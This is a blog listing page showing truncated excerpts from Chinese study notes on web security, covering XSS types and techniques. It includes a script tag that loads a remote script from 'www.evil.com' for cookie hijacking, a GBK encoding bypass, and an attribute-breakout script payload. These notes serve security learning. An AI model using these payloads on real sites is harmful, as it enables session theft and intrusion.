白帽子讲web安全笔记
文章平均质量分 53
奶茶里的红豆
这个作者很懒,什么都没留下…
展开
-
白帽子讲web安全笔记——XSS(一)
XSS 跨站脚本攻击三种类型:1.反射型:简单的把用户输入的数据“反射”给浏览器2.存储型:把用户输入的数据“存储”在服务器端 具有很强的稳定性3.DOM Based:修改页面的DOM节点形成的XSS攻击: Cookie劫持先加载一个远程脚本 <script src=http://www.evil.com/evil.js></scrip...原创 2018-09-20 19:44:08 · 365 阅读 · 0 评论 -
白帽子讲web安全笔记——XSS(二)
XSS构造技巧利用字符编码由于采用GBK/GB2312编码 %c1\长两个字符组合在一起会成为一个新的Unicode,会变成一个字符从而绕过系统的安全检查。绕过长度限制假设下面的代码存在一个漏洞<input type=text value="$var" />那下面的XSS构造就会失效"><script>alert(/xss/)<...原创 2018-09-21 10:53:37 · 298 阅读 · 0 评论